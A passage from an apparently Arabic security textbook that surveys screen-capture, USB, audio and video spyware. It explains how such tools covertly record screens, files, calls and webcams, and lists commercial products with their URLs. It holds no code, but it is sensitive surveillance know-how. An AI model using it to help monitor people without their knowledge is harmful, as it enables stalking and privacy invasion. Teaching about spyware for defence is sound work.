‫ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت اﻟﺗﻲ ﺗﻣت زﯾﺎرﺗﮭﺎ‪ ،‬وأﻧﺷطﺔ اﻟطﺎﺑﻌﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ھذا اﻟﺑرﻧﺎﻣﺞ أو اﻟﺑراﻣﺞ ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر‬
‫اﻟﻣﺗﺻﻠﺔ ﺑﺎﻟﺷﺑﻛﺔ ﻟرﺻد أﻧﺷطﺔ ﺟﻣﯾﻊ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر ﻋﻠﻰ اﻟﺷﺑﻛﺔ ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ ﻣن ﺧﻼل أﺧذ ﻟﻘطﺎت اﻟﺷﺎﺷﺔ‪ .‬ھذا ﯾﻌﻣل ﻓﻲ وﺿﻊ‬
‫اﻟﺷﺑﺢ )‪ (stealth mode‬ﺣﺗﻰ ﺗﺗﻣﻛن ﻣن رﺻد أﻧﺷطﺔ أي ﺷﺧص ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون ﻋﻠﻣﮭم‪.‬‬
‫ﻣﻊ ھذه اﻟﺑراﻣﺞ‪ ،‬ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن ﻣراﻗﺑﺔ ﻛﻣﺑﯾوﺗر وﺗﺣدﯾد أﻧﺷطﺔ اﻟﻣﺳﺗﺧدﻣﯾن ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﻷﻧﮭﺎ ﺗﺑﺣث ﻓﻲ اﻟﻛﻣﺑﯾوﺗر)‪ .(live‬ﯾدار ھذا‬
‫اﻟﺑرﻧﺎﻣﺞ ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ .‬ﻓﺈﻧﮫ ﯾﺄﺧذ ﻟﻘطﺎت ﻟﻛل ﺗطﺑﯾﻖ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺗم ﻓﺗﺣﮫ ﺑﺣﯾث ﯾﻣﻛن ﻟﻠﻣﺳﺗﺧدﻣﯾن اﻟﺗﻌرف ﻋﻠﻰ ﻛل ﻋﻣل ﻋﻠﻰ‬
‫اﻟﻛﻣﺑﯾوﺗر ﻓﻲ اﻟوﻗت اﻟﺣﻘﯾﻘﻲ‪.‬‬
‫‪Screen Capturing Spyware: SoftActivity TS Monitor‬‬
‫اﻟﻣﺻدر‪http://www.softactivity.com :‬‬
‫‪ SoftActivity TS Monitor‬ھو ‪ terminal-server sessions‬واﻟذى ﯾﺳﺟل ﻟﻘطﺎت ﻟﻛل ﻋﻣل اﻟﻣﺳﺗﺧدم‪ .‬ﻓﺈﻧﮫ ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ‬
‫أﻧﺷطﺔ اﻟﻣﺳﺗﺧدم اﻟﺑﻌﯾد ﻋﻠﻰ ﻣﻠﻘم اﻟﺗرﻣﻧﺎل )‪ (Windows terminal server‬اﻟﺧﺎص ﺑك وﻣراﻗﺑﺔ ﻣوظﻔﯾك اﻟذﯾن ﯾﻌﻣﻠون ﻣن اﻟﻣﻧزل أو‬
‫اﻟﻣﻧﺎطﻖ ﻋن ﺑﻌد او ﻣن ﺧﻼل رﺣﻼت اﻟﻌﻣل ﻋﺑر ‪ .RDP‬ھذا ﯾﻣﻛن أﯾﺿﺎ ﻣراﻗﺑﺔ ﻣﺎ ﯾﻔﻌﻠﮫ اﻟﻣﺳﺗﺧدﻣون ﻋﻠﻰ ﺷﺑﻛﺔ اﻟﻌﻣﯾل‪ ،‬دون ﺗرﻛﯾب أي‬
‫ﺑرﻧﺎﻣﺞ ﻋﻠﻰ ﺷﺑﻛﺔ اﻻﺗﺻﺎل‪ .‬ﯾﻣﻛﻧﮫ أﯾﺿﺎ ﺗوﺛﯾﻖ اﻟﺗﻐﯾرات ﻋﻠﻰ إﻋداد اﻟﺧوادم ﻋن طرﯾﻖ ﺗﺳﺟﯾل اﻟﺟﻠﺳﺎت اﻹدارﯾﺔ اﻟﺑﻌﯾدة واﻟﻣﺣﻠﯾﺔ‪ .‬ﯾﻣﻛن‬
‫أﯾﺿﺎ ﺗﺄﻣﯾن ﺑﯾﺎﻧﺎت اﻟﺷرﻛﺎت ﻋن طرﯾﻖ ﻣﻧﻊ ﺳرﻗﺔ اﻟﻣﻌﻠوﻣﺎت ﻣن ﻗﺑل اﻟﻣطﻠﻌﯾن‪ .‬زﯾﺎدة إﻧﺗﺎﺟﯾﺔ اﻟﻣوظﻔﯾن وﺗﺣﺳﯾن اﻷﻣن‪ .‬ھذا ‪terminal‬‬
‫‪ server monitoring software‬ﺗﻛون ﻏﯾر ﻣرﺋﯾﺔ ﺗﻣﺎﻣﺎ ﻟﻠﻣﺳﺗﺧدﻣﯾن‪.‬‬

‫‪Screen Capturing Spyware: Other tools‬‬

‫‪ Screen capturing spyware‬ھو اﻟﺑرﻧﺎﻣﺞ اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ أﻧﺷطﺔ اﻟﻛﻣﺑﯾوﺗر ﻟطﻔﻠك أو اﻟﻌﺎﻣﻠﯾن ﺑﮭﺎ أو أﺧذ ﻟﻘطﺎت‬
‫‪ Screenshot‬ﻟﻠﻛل وﻟﻛل ﺗطﺑﯾﻖ ﺗم ﻓﺗﺣﮫ ﻋﻠﻰ ﺟﮭﺎز اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺛﺑت ﻋﻠﯾﮫ اﻟﺑرﻧﺎﻣﺞ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ‪Screen capturing‬‬
‫‪ spyware‬ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪Desktop Spy available at http://www.spyarsenal.com‬‬
‫‪IcyScreen available at http://www.16software.com‬‬
‫‪Spector Pro available at http://www.spectorsoft.com‬‬
‫‪PC Tattletale available at http://www.pctattletale.com‬‬
‫‪Computer Screen Spy Monitor available at http://www.mysuperspy.com‬‬
‫‪PC Screen Spy Monitor available at http://ematrixsoft.com‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪421‬‬

‫‪Kahlown Screen Spy Monitor available at http://www.lesoftrejion.com‬‬


‫‪Guardbay Remote Computer Monitoring Software available at http://www.guardbay.com‬‬
‫‪HT Employee Monitor available at http://www.hidetools.com‬‬
‫‪Spy Employee Monitor available at http://www.spysw.com‬‬
‫‪USB Spyware‬‬

‫‪ USB spyware‬ھو ﺑرﻧﺎﻣﺞ أو ﺑرﻣﺟﯾﺎت ﻣﺻﻣﻣﺔ ﻟﻠﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر و ﺗﺧﻔﻰ ﻓﻲ ﺟﮭﺎز ‪ USB spyware. USB‬ﯾﻧﺳﺦ ﻣﻠﻔﺎت‬
‫اﻟﺗﺟﺳس ﻣن أﺟﮭزة ‪ USB‬إﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت دون أي طﻠب أو إﻋﻼم‪ .‬ھذا ﯾﻌﻣل ﺑطرﯾﻘﺔ ﺧﻔﯾﺔ وﺑﺎﻟﺗﺎﻟﻲ ﻓﺈن ﻣﺳﺗﺧدﻣﻲ اﻟﻛﻣﺑﯾوﺗر ﻻ ﯾﻛون ﻋﻠﻰ‬
‫ﺑﯾﻧﺔ ﻣن وﺟود ﺑراﻣﺞ اﻟﺗﺟﺳس ﻋﻠﻰ أﺟﮭزة اﻟﻛﻣﺑﯾوﺗر اﻟﺧﺎﺻﺔ ﺑﮭم‪.‬‬
‫ﯾوﻓر‪ USB spyware‬ﺣﻠول ﻣﺗﻌدد اﻷوﺟﮫ ﻓﻲ ﻣﺣﺎﻓظ اﺗﺻﺎﻻت‪ USB spyware. USB‬ﻗﺎدر ﻋﻠﻰ رﺻد ﻧﺷﺎط أﺟﮭزة ‪ USB‬دون إﻧﺷﺎء‬
‫ﻓﻼﺗر إﺿﺎﻓﯾﺔ أو اﺟﮭزه )‪ (device‬و ﻏﯾرھﺎ‪ ،‬واﻟﺗﻲ ﻗد ﺗﺿر ﺑﮭﯾﻛل اﻟﻧظﺎم‪.‬‬
‫‪ USB spyware‬ﯾﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل و ﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪.‬‬
‫وھذا ﯾﺗﯾﺢ اﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة‪ ،‬واﻟذي ﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﻠﻛود اﻟﻔﻌﺎل واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن وﯾﺟﻌﻠﮭﺎ أداة‬
‫ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت‪.‬‬
‫ﻓﺈﻧﮫ ﯾﻠﺗﻘط ﺟﻣﯾﻊ اﻻﺗﺻﺎﻻت ﺑﯾن ﺟﮭﺎز ‪ USB‬وﻣﺿﯾﻔﮫ وﺣﻔظﮭﺎ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻟﻠﻣراﺟﻌﺔ ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬ﯾﻌرض ﺳﺟل ﺗﻔﺻﯾﻠﻲ ﻣﻠﺧﺻﺎ ﻟﻛل‬
‫ﻣﻌﺎﻣﻼت اﻟﺑﯾﺎﻧﺎت ﺟﻧﺑﺎ إﻟﻰ ﺟﻧب ﻣﻊ ﻣﻌﻠوﻣﺎت اﻟدﻋم‪ .‬ﯾﺳﺗﺧدم ‪ USB spyware‬ﻗﻠﯾﻼ ﻣن ﻣوارد اﻟﻧظﺎم ﻣن اﻟﻛﻣﺑﯾوﺗر اﻟﻣﺿﯾف‪ .‬ھذا ﯾﻌﻣل ﻣﻊ‬
‫اﻟطﺎﺑﻊ اﻟزﻣﻧﻲ اﻟﺧﺎﺻﺔ ﺑﮫ ﻟﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻷﻧﺷطﺔ ﻓﻲ ﺗﺳﻠﺳل اﻻﺗﺻﺎﻻت‪.‬‬
‫‪ USB spyware‬ﻻ ﯾﺣﺗوي ﻋﻠﻰ ‪ adware‬أو ‪ .spyware‬وھﻲ ﺗﻌﻣل ﻣﻊ ﻣﻌظم اﻻﺻدارات اﻷﺧﯾرة ﻣن اﻟوﯾﻧدوز‪.‬‬
‫‪ USB spyware -‬ﯾﻧﺳﺦ اﻟﻣﻠﻔﺎت ﻣن أﺟﮭزة ‪ USB‬إﻟﻰ اﻟﻘرص اﻟﺛﺎﺑت ﻓﻲ ﺧﻔﯾﺔ ﻣن دون أي طﻠب‪.‬‬
‫‪ -‬ﯾﻘوم ﺑﺈﻧﺷﺎء ﻣﻠف ﻣﺧﻔﻲ‪/‬ﻣﺟﻠد ﻣﻊ اﻟﺗﺎرﯾﺦ اﻟﺣﺎﻟﻲ واﻟﺑدا ﻣن ﻋﻣﻠﯾﺔ اﻟﻧﺳﺦ اﻟﺧﻠﻔﻲ )‪.(background copies‬‬
‫‪ -‬ﺗﺗﯾﺢ ﻟك اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﻣﻧﻘوﻟﺔ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪.‬‬
‫‪USB Spyware: USBSpy‬‬
‫اﻟﻣﺻدر‪http://www.everstrike.com :‬‬
‫‪ USBSpy‬ﺗﻣﻛﻧك ﻣن اﻟﺗﻘﺎط وﻋرض وﺗﺳﺟﯾل وﺗﺣﻠﯾل اﻟﺑﯾﺎﻧﺎت اﻟﺗﻲ ﯾﺗم ﻧﻘﻠﮭﺎ ﺑﯾن أي ﺟﮭﺎز ‪ USB‬ﻣﺗﺻﻼ ﺑﺟﮭﺎز ﻛﻣﺑﯾوﺗر واﻟﺗطﺑﯾﻘﺎت‪ .‬وھذا‬
‫ﯾﺟﻌﻠﮭﺎ أداة ﻋظﯾﻣﺔ ﻟﺗﺻﺣﯾﺢ أﺧطﺎء اﻟﺑرﻣﺟﯾﺎت‪ ،‬واﻟﻌﻣل ﻋﻠﻰ ﺗطوﯾر ﺑرﻧﺎﻣﺞ ﺗﺷﻐﯾل اﻟﺟﮭﺎز أو اﻷﺟﮭزة‪ ،‬وﯾوﻓر ﻣﻧﺻﺔ ﻗوﯾﺔ ﻟﺗرﻣﯾز ﻓﻌﺎل‬
‫واﻻﺧﺗﺑﺎر واﻟﺗﺣﺳﯾن‪ .‬ﯾﺟﻌل ﺣرﻛﺔ اﻟﻣرور ‪ (USB Traffic) USB‬ﯾﻣﻛن اﻟوﺻول إﻟﯾﮭﺎ ﺑﺳﮭوﻟﺔ ﻷﻏراض اﻟﺗﺣﻠﯾل واﻟﺗﺻﺣﯾﺢ‪ .‬ﯾﻣﻛﻧﮫ اﻟﻔﻠﺗرة‬
‫ﺣﺗﻰ ﯾﻘدم اﻟﺑﯾﺎﻧﺎت اﻟﻣطﻠوﺑﺔ ﻓﻘط‪ .‬ذات واﺟﮭﺔ ﯾﺟﻌل ﺗﺗﺑﻊ اﻻﺗﺻﺎﻻت ﺑﺳﮭوﻟﮫ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪422‬‬

‫‪USB Spyware: Other tools‬‬


‫ﺑﻌض ﻣن ﺗطﺑﯾﻘﺎت ‪ USB Spyware‬اﻟﻣﺗوﻓر ﻓﻲ اﻟﺳوق ﻛﺎﻻﺗﻰ‪:‬‬
‫‪USB Monitor available at http://www.hhdsoftware.com‬‬
‫‪USB Grabber available at http://usbgrabber.sourceforge.net‬‬
‫‪USBTrace available at http://www.sysnucleus.com‬‬
‫‪USBDeview available at http://www.nirsoft.net‬‬
‫‪Advanced USB Port Monitor available at http://www.aggsoft.com‬‬
‫‪USB Monitor Pro available at http://www.usb-monitor.com‬‬
‫‪USB Activity Monitoring Software available at http://www.datadoctor.org‬‬
‫‪Stealth iBot Computer Spy available at http://www.brickhousesecurity.com‬‬
‫‪KeyCarbon USB Hardware Keylogger available at http://www.spywaredirect.net‬‬
‫‪USB 2GB Keylogger available at http://diij.com‬‬
‫‪Audio Spyware‬‬

‫‪ Audio spyware‬ھﻲ ﺑراﻣﺞ ﻟﻣراﻗﺑﺔ اﻟﺻوت اﻟﺗﻲ ﺗم ﺗﺻﻣﯾﻣﮭﺎ ﻻﻟﺗﻘﺎط اﻟﻣوﺟﺎت اﻟﺻوﺗﯾﺔ أو ﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﻣﻛن ﺗﺛﺑﯾت ﺑراﻣﺞ‬
‫اﻟﺗﺟﺳس ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر دون اﻟﺣﺻول ﻋﻠﻰ إذن ﻣن ﻣﺳﺗﺧدم اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم ﺗﺛﺑﯾت ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺑطرﯾﻘﺔ ﺻﺎﻣﺗﺔ دون‬
‫إرﺳﺎل أي إﺷﻌﺎر ﻟﻠﻣﺳﺗﺧدم وﯾﻌﻣل ﻓﻲ اﻟﺧﻠﻔﯾﺔ ﻟﺗﺳﺟﯾل ﻣﺧﺗﻠف اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر ﺳرا‪ .‬اﺳﺗﺧدام ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ﻻ ﯾﺗطﻠب أي‬
‫اﻣﺗﯾﺎزات إدارﯾﺔ‪.‬‬
‫‪ Audio spyware‬ﺗرﺻد وﺗﺳﺟل ﻣﺟﻣوﻋﺔ ﻣﺗﻧوﻋﺔ ﻣن اﻷﺻوات ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر‪ .‬ﯾﺗم ﺣﻔظ اﻷﺻوات اﻟﻣﺳﺟﻠﺔ ﻓﻲ ﻣﻠف ﻣﺧﻔﻲ ﻋﻠﻰ‬
‫اﻟﻘرص اﻟﻣﺣﻠﻲ ﻟﻼﺳﺗرداد ﻓﻲ وﻗت ﻻﺣﻖ‪ .‬وﺑﺎﻟﺗﺎﻟﻲ‪ ،‬ﻓﺎن اﻟﻣﮭﺎﺟﻣﯾن أو اﻟﻣﺳﺗﺧدﻣﯾن اﻟﺿﺎرﯾن ﯾﺳﺗﺧدﻣوا ﺑراﻣﺞ ﺗﺟﺳس اﻟﺻوت ھذه ﻟﻠﺗﺣري‬
‫ورﺻد ﺗﺳﺟﯾﻼت اﻟﻣﺣﺎدﺛﺔ‪ ،‬واﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬واﻟﺑث اﻹذاﻋﻲ‪ ،‬واﻟﺗﻲ ﻗد ﺗﺣﺗوي ﻋﻠﻰ ﻣﻌﻠوﻣﺎت ﺳرﯾﺔ‪.‬‬
‫‪ Audio spyware‬ﻗﺎدر ﻋﻠﻰ اﻟﺗﺳﺟﯾل واﻟﺗﺟﺳس ﻋﻠﻰ رﺳﺎﺋل اﻟدردﺷﺔ اﻟﺻوﺗﯾﺔ ﻣن ﻣﺧﺗﻠف ﺗطﺑﯾﻘﺎت اﻟدردﺷﺔ ذات اﻟﺷﻌﺑﯾﺔ‪ .‬ﻣﻊ ﺑراﻣﺞ‬
‫ﺗﺟﺳس اﻟﺻوت ھذه ﯾﻣﻛن ﻟﻠﻧﺎس ﻣﺷﺎھدة ﻣوظﻔﯾﮭﺎ أو اﻷطﻔﺎل وﻣﻌرﻓﺔ ﻣن ﯾﺗواﺻﻠوا ﻣﻌﮭم‪.‬‬
‫‪ Audio spyware‬ﯾﻣﻛن اﺳﺗﺧداﻣﮭﺎ ﻟﻣراﻗﺑﺔ أﺟﮭزة اﻟﺻوت اﻟرﻗﻣﯾﺔ ﻣﺛل ﻣﺧﺗﻠف اﻟرﺳل‪ ،‬اﻟﻣﯾﻛروﻓوﻧﺎت‪ ،‬واﻟﮭواﺗف اﻟﻣﺣﻣوﻟﺔ‪ .‬ﻓﺈﻧﮫ ﯾﻣﻛن‬
‫ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت اﻟﺻوﺗﯾﺔ ﻋن طرﯾﻖ اﻟﺗﻧﺻت وﻣراﻗﺑﺔ ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت اﻟﺻﺎدرة ‪ ingoing‬و‪ ،‬واﻟرﺳﺎﺋل اﻟﻧﺻﯾﺔ‪ ،‬اﻟﺦ اﻧﮭﺎ ﺗﺳﻣﺢ ﻟﻠرﺻد‬
‫اﻟﻣﻛﺎﻟﻣﺔ اﻟﺣﯾﺔ‪ ،‬وﻣراﻗﺑﺔ اﻟﺻوت‪ ،‬ﻣﺳﺎر ‪ ،SMS‬ﺗﺳﺟﯾل ﺟﻣﯾﻊ اﻟﻣﻛﺎﻟﻣﺎت‪ ،‬وﺗﺗﺑﻊ ﺟﻲ ﺑﻲ آر إس‪.GPRS‬‬
‫‪Audio Spyware: Spy Voice Recorder‬‬
‫اﻟﻣﺻدر‪http://www.mysuperspy.com :‬‬
‫‪ Spy Voice Recorder‬ھو ﺑرﻧﺎﻣﺞ ﺗﺟﺳس اﻟﻛﻣﺑﯾوﺗر اﻟذي ﯾﺳﻣﺢ ﻟك ﻟرﺻد اﻟﺻوت وﺗﺳﺟﯾل اﻟﺻوت ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﻓﺈﻧﮫ ﯾﺳﺟل ﺑﺧﻔﺎء‬
‫ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﻋﻠﻰ اﻻﻧﺗرﻧت اﻟﻣﺣرز ﻓﻲ ﺑراﻣﺞ اﻟﻣﺣﺎدﺛﺔ أو ﺑراﻣﺞ اﻟرﺳﺎﺋل اﻟﻔورﯾﺔ ذات ﺷﻌﺑﯾﺔ ﺑﻣﺎ ﻓﻲ ذﻟك أﻧواع ﻣﺧﺗﻠﻔﺔ ﻣن ﺗطﺑﯾﻘﺎت‬
‫اﻷﺣﺎدﯾث اﻟﺻوﺗﯾﺔ اﻟﻣﺗﺎﺣﺔ ﻋﻠﻰ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل ‪،Yahoo! Messenger Voice chat ،Skype Voice Chat ،MSN Voice Chat‬‬
‫‪ ،QQ Voice Chat ،ICQ Voice Chat‬اﻟﺦ‪ .‬ﯾﻣﻛن أﯾﺿﺎ ﺗﺳﺟﯾل اﻻﺻوات اﻟﻣﺗدﻓﻘﺔ اﻷﺧرى ﻣن اﻹﻧﺗرﻧت‪ ،‬وﻟﻌب اﻟﻣوﺳﯾﻘﻰ وأﺻوات‬
‫اﻟﻣﯾﻛروﻓون واﻟﺳﻣﺎﻋﺎت‪ ،‬اﻟﺦ‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪423‬‬

‫‪Audio Spyware: Sound Snooper‬‬


‫اﻟﻣﺻدر‪http://www.sound-snooper.com :‬‬
‫‪ Sound Snooper‬ھو ﺑرﻧﺎﻣﺞ ﺗﺟﺳس اﻟذي ﯾﺳﻣﺢ ﻟك ﺑﻣراﻗﺑﺔ اﻟﺻوت‪ ،‬وﺗﺳﺟﯾﻼت اﻻﺻوات ﻋﻠﻰ اﻟﻧظﺎم‪ .‬ﯾﺑدأ ﺗﺳﺟﯾل اﻟﺻوت ﺑﺧﻔﺎء‬
‫ﺑﻣﺟرد اﻛﺗﺷﺎف أي ﻣن اﻷﺻوات وﯾﺗوﻗف ﺗﻠﻘﺎﺋﯾﺎ ﻋن اﻟﺗﺳﺟﯾل ﻋﻧدﻣﺎ ﯾﺧﺗﻔﻲ اﻟﺻوت‪ .‬ﯾﻣﻛﻧك اﺳﺗﺧدام ھذه ﻓﻲ ﺗﺳﺟﯾل اﻟﻣﺣﺎدﺛﺎت‪ ،‬رﺻد‬
‫اﻟﻣﻛﺎﻟﻣﺎت اﻟﮭﺎﺗﻔﯾﺔ‪ ،‬ﺳﺟﻼت اﻟﺑث اﻹذاﻋﻲ واﻟﺗﺟﺳس ورﺻد اﻟﻣوظف‪ ،‬وﻣﺎ إﻟﻰ ذﻟك‪ .‬ﯾﺣﺗوي ﻋﻠﻰ أداة ﺗﻧﺷﯾط ﺗﺳﺟﯾل اﻟﺻوت‪ ،‬وﯾدﻋم ﺑطﺎﻗﺎت‬
‫ﺻوت ﻣﺗﻌددة‪ ،‬وﯾﺧزن ﻣﻠﻔﺎت اﻟﺻوت ﻓﻲ أي ﻧوع ﻣن أﻧواع ﻣﻠﻔﺎت اﻟﺻوت‪ ،‬ﯾرﺳل رﺳﺎﺋل اﻟﺑرﯾد اﻹﻟﻛﺗروﻧﻲ ﻣﻊ ﻣرﻓﻘﺎت ﻋﺑﺎره ﻋن اﻟﻣﻠﻔﺎت‬
‫اﻟﺗﻲ ﺗم ﺗﺳﺟﯾﻠﮭﺎ‪ ،‬وﯾدﻋم وﯾﻧدوز‪.‬‬

‫‪Video Spyware‬‬

‫‪ Video spyware‬ھو ﺑرﻧﺎﻣﺞ ﻟﻠﻣراﻗﺑﺔ اﻟﻔﯾدﯾو‪ .‬ﻣﻊ ھذا اﻟﺑرﻧﺎﻣﺞ‪ ،‬ﯾﻣﻛﻧك ﺗﺳﺟﯾل ﻛل ﻧﺷﺎط ﻓﯾدﯾو ﻣﻊ ﺟدول زﻣﻧﻲ ﻣﺑرﻣﺞ‪ .‬وھذا ﯾﻣﻛن أن ﯾﺗم‬
‫ﺗﺛﺑﯾﺗﮭﺎ ﻋﻠﻰ اﻟﻛﻣﺑﯾوﺗر اﻟﮭدف دون ﻋﻠم اﻟﻣﺳﺗﺧدم‪ .‬ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﻌﻣل ﺑﺷﻔﺎﻓﯾﺔ ﻓﻲ اﻟﺧﻠﻔﯾﺔ‪ ،‬ﺗﻘوم ﺑرﺻد وﺗﺳﺟﯾل اﻟﻛﺎﻣﯾرات وﻣﺣﺎدﺛﺎت‬
‫اﻟﻔﯾدﯾو ‪ IM‬ﺳرا‪ .‬ﻣﯾزة اﻟوﺻول ﻋن ﺑﻌد ﻟﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﺗﺳﻣﺢ ﻟﻠﻣﮭﺎﺟﻣﯾن اﻻﺗﺻﺎل ﺑﺎﻟﻧظﺎم اﻟﺑﻌﯾد أو اﻟﮭدف ﻣن أﺟل ﺗﻔﻌﯾل اﻟﺗﻧﺑﯾﮭﺎت‬
‫واﻷﺟﮭزة اﻟﻛﮭرﺑﺎﺋﯾﺔ وﻣﺷﺎھدة اﻟﺻور اﻟﻣﺳﺟﻠﺔ ﻓﻲ أرﺷﯾف اﻟﻔﯾدﯾو أو ﺣﺗﻰ اﻟﺣﺻول ﻋﻠﻰ ﺻور ﺣﯾﺔ ﻣن ﺟﻣﯾﻊ اﻟﻛﺎﻣﯾرات اﻟﻣﺗﺻﻠﺔ ﻟﮭذا اﻟﻧظﺎم‬
‫ﺑﺎﺳﺗﺧدام ﻣﺗﺻﻔﺢ ﺷﺑﻛﺔ اﻹﻧﺗرﻧت ﻣﺛل اﻧﺗرﻧت اﻛﺳﺑﻠورر‪.‬‬

‫‪Video Spyware: Webcam Recorder‬‬


‫اﻟﻣﺻدر‪http://webcamrecorder.com :‬‬
‫‪ Webcam Recorder‬ھو ﺑرﻧﺎﻣﺞ ﻟﻣراﻗﺑﺔ اﻟﻔﯾدﯾو واﻟذى ﯾﺳﻣﺢ ﻟك ﻟﺗﺳﺟﯾل أي ﺷﻲء ﻋﻠﻰ اﻟﺷﺎﺷﺔ ﻣﺛل اﻟﻛﺎﻣﯾرات اﻟﺗﻲ ﺗﻌﻣل ﻋﻠﻰ اﻟﻣﺗﺻﻔﺢ‬
‫اﻟﺧﺎص ﺑك‪ ،‬ﻣﺣﺎدﺛﺎت اﻟدردﺷﺔ ﺑﺎﻟﻔﯾدﯾو‪ ،‬واﻟﻣﺣﺗوى ﻣن ﻣواﻗﻊ اﻟﻔﯾدﯾو ﻣﺛل ﯾوﺗﯾوب‪ ،‬واﻟﻌﺎب اﻟﻔﯾدﯾو ﻋﻠﻰ ﺳطﺢ اﻟﻣﻛﺗب‪.‬‬

‫‪https://www.facebook.com/tibea2004‬‬ ‫د‪ .‬ﻣﺣﻣد ﺻﺑﺣﻲ طﯾﺑﮫ‬


‫‪424‬‬

‫‪Video Spyware: other tools‬‬


‫ﯾﺗوﻓر اﻟﻌدﯾد ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو ﻓﻲ اﻟﺳوق ﻟﻠﻣراﻗﺑﺔ اﻟﻔﯾدﯾو ﺑﺳرﯾﺔ‪ .‬ﺣﯾث ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟم اﺳﺗﺧدام ھذا اﻟﺑراﻣﺞ ﻟﻠﻣراﻗﺑﺔ ﺳرا وﺗﺳﺟﯾل‬
‫ﻛﺎﻣﯾرات اﻟوﯾب وﻣﺣﺎدﺛﺎت ‪ IM‬اﻟﻔﯾدﯾو‪ .‬ﯾﻣﻛن ﻟﻠﻣﮭﺎﺟﻣﯾن اﺳﺗﺧدام ﺑراﻣﺞ اﻟﺗﺟﺳس ﻟﻣﺷﺎھدة اﻟﻔﯾدﯾو ﻋن ﺑﻌد ﻛﺎﻣﯾرات اﻟوﯾب ﻣن أﺟل اﻟﺣﺻول‬
‫ﻋﻠﻰ ﻟﻘطﺎت ﺣﯾﺔ ﻣن اﻻﺗﺻﺎﻻت اﻟﺳرﯾﺔ‪ .‬ﻣﻊ ﻣﺳﺎﻋدة ﻣن ھذه اﻟﺑراﻣﺞ‪ ،‬ﯾﻣﻛن اﻟﻣﮭﺎﺟﻣﯾن ﻣن ﺗﺳﺟﯾل وﺗﺷﻐﯾل أي ﺷﻲء ﻋرض ﻋﻠﻰ ﺷﺎﺷﺔ‬
‫اﻟﺿﺣﯾﺔ‪ .‬وﻓﯾﻣﺎ ﯾﻠﻲ ﺑﻌض ﻣن ﺑراﻣﺞ ﺗﺟﺳس اﻟﻔﯾدﯾو اﻟﻣﺳﺗﺧدﻣﺔ ﻟﮭذه اﻷﻏراض ﻋﻠﻰ اﻟﻧﺣو اﻟﺗﺎﻟﻲ‪:‬‬
‫‪WebcamMagic available at http://www.robomagic.com‬‬
